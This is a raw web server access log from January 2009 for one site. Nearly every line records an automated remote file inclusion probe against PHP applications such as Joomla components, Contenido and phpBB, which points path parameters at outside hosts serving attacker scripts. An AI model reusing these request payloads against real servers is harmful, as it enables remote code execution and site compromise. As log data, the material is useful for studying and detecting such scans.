211.234.111.100 - - [30/Jan/2009:11:00:02 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.234.111.100 - - [30/Jan/2009:11:00:05 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:11:00:06 -0800] "GET /logs/access_081008.log/errors.php?error=http://h1.ripway.com/felixspyware/tukulesto/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:11:00:14 -0800] "GET /logs/access_080128.log///index2.php?c=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:23 -0800] "GET /logs/access_081110.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:23 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:23 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:38 -0800] "GET /logs/access_081110.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:38 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:38 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:47 -0800] "GET /logs/access_081110.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:47 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:00:47 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
208.109.93.49 - - [30/Jan/2009:11:00:53 -0800] "GET /logs/access_081116.log HTTP/1.1" 200 3403748 "-" "curl/7.18.2 (i386-pc-win32) libcurl/7.18.2 zlib/1.2.3" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:00:55 -0800] "GET /logs/access_080412.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:00:55 -0800] "GET /logs/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 84604 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:00:55 -0800] "GET /?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 200 94616 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:01:02 -0800] "GET /logs/access_080831.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:17 -0800] "GET /logs/access_081110.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:17 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:17 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:01:44 -0800] "GET /logs/access_080831.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:01:45 -0800] "GET /logs/access_080412.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:52 -0800] "GET /logs/access_080913.log//index.php?content=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:52 -0800] "GET /logs/access_071129.log/index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:53 -0800] "GET /index.php?content=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 200 94803 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:54 -0800] "GET /index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 200 94768 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:55 -0800] "GET /logs//index.php?content=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:55 -0800] "GET /logs/index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:57 -0800] "GET /logs/access_071129.log/index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:58 -0800] "GET /index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 200 94752 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:01:59 -0800] "GET /logs/index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:02:07 -0800] "GET /logs/access_080913.log//index.php?content=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:02:09 -0800] "GET /index.php?content=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 200 94803 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:02:10 -0800] "GET /logs//index.php?content=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:02:24 -0800] "GET /logs/access_071228.log/index.php?pg=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:02:30 -0800] "GET /logs/access_071228.log/index.php?pg=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:02:35 -0800] "GET /logs/main.php?pagina=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:02:35 -0800] "GET /main.php?pagina=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:11:02:46 -0800] "GET /logs/access_080524.log///index2.php?c=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:02:47 -0800] "GET /logs/access_071228.log/index.php?pg=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:11:02:47 -0800] "GET //index2.php?c=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:11:02:48 -0800] "GET /logs///index2.php?c=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.76.199.10 - - [30/Jan/2009:11:04:22 -0800] "GET /logs/access_080711.log HTTP/1.1" 200 2821755 "http://www.dmulk.com/logs/access_080711.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:04:23 -0800] "GET /logs/access_081227.log/includes/functions_module.php?phpbb_root_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:04:24 -0800] "GET /includes/functions_module.php?phpbb_root_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:04:24 -0800] "GET /logs/includes/functions_module.php?phpbb_root_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.182.2 - - [30/Jan/2009:11:05:19 -0800] "GET /logs/access_080702.log//phpSecurePages/secure.php?&cfgProgDir=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.182.2 - - [30/Jan/2009:11:05:19 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.182.2 - - [30/Jan/2009:11:05:19 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.182.2 - - [30/Jan/2009:11:05:19 -0800] "GET /logs/access_080904.log//phpSecurePages/secure.php?&cfgProgDir=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:11:05:51 -0800] "GET /logs/access_081007.log/includes/useragent.inc.php?prefix=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:11:05:51 -0800] "GET /includes/useragent.inc.php?prefix=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:11:05:51 -0800] "GET /logs/includes/useragent.inc.php?prefix=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:14 -0800] "GET /logs/access_080512.log///index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:14 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:15 -0800] "GET /logs/access_080515.log///index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:15 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:30 -0800] "GET /logs/access_080819.log///index.php?_REQUEST=&_REQUEST[option]=com_rwcards&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:31 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_rwcards&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:31 -0800] "GET /logs/access_080812.log///index.php?_REQUEST=&_REQUEST[option]=com_rwcards&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:11:06:31 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_rwcards&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.823" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:11:06:44 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:11:06:44 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:11:06:44 -0800] "GET /logs/access_080905.log%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:11:07:14 -0800] "GET /logs/access_080412.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:11:07:17 -0800] "GET /logs/access_080831.log%20%20/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:08:50 -0800] "GET /logs/access_080806.log//index.php?content=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.182.2 - - [30/Jan/2009:11:09:00 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:09:01 -0800] "GET /logs/access_080905.log%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:09:01 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:09:01 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:11:09:56 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:11:09:57 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:11:10:18 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:11:10:18 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:11:10:18 -0800] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:11:10:22 -0800] "GET /logs/access_080613.log%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:11:10:38 -0800] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:11:07 -0800] "GET /logs/access_080613.log%20%20/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:11:11:21 -0800] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.16.91.22 - - [30/Jan/2009:11:11:43 -0800] "GET /logs/access_080414.log/main.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [30/Jan/2009:11:11:43 -0800] "GET /logs/main.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [30/Jan/2009:11:11:43 -0800] "GET /main.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:11:13:03 -0800] "GET /logs/index.php?redir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:11:13:07 -0800] "GET /index.php?redir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 94796 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:11:13:43 -0800] "GET /logs/access_071129.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:11:13:43 -0800] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:11:13:43 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:14:23 -0800] "GET /logs///vwar/backup/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:14:23 -0800] "GET /logs/access_080827.log///vwar/backup/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:14:23 -0800] "GET //vwar/backup/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
118.45.190.171 - - [30/Jan/2009:11:14:51 -0800] "GET /Neos_Chronos/header.php?base_folder=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.171 - - [30/Jan/2009:11:14:51 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.171 - - [30/Jan/2009:11:14:51 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.171 - - [30/Jan/2009:11:14:51 -0800] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:14:52 -0800] "GET /logs/access_080805.log///vwar/backup/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:14:56 -0800] "GET /logs/access_080321.log/index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:11:15:39 -0800] "GET /logs/access_080118.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:11:16:29 -0800] "GET /logs/access_080905.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:11:16:29 -0800] "GET /logs/access_080128.log///index2.php?c=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:11:16:58 -0800] "GET /errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:11:16:58 -0800] "GET /logs/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:11:16:58 -0800] "GET /logs/access_081121.log%20%20/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:11:17:19 -0800] "GET /logs/access_080411.log%20%20/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:11:17:42 -0800] "GET /logs/access_080321.log/index.php?pg=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:11:18:05 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.213.65.178 - - [30/Jan/2009:11:18:36 -0800] "GET /logs/access_080905.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:11:18:59 -0800] "GET /logs/access_080502.log//components/errors.php?error=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:11:18:59 -0800] "GET /components/errors.php?error=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:11:18:59 -0800] "GET /logs//components/errors.php?error=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:11:18:59 -0800] "GET /logs/access_071122.log//components/errors.php?error=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:19:19 -0800] "GET /logs/access_071230.log/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:19:19 -0800] "GET /components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:19:19 -0800] "GET /logs/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:19:24 -0800] "GET /logs/access_081222.log/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:19:32 -0800] "GET /logs/access_080412.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:11:19:43 -0800] "GET /logs/access_080831.log/?sourcedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
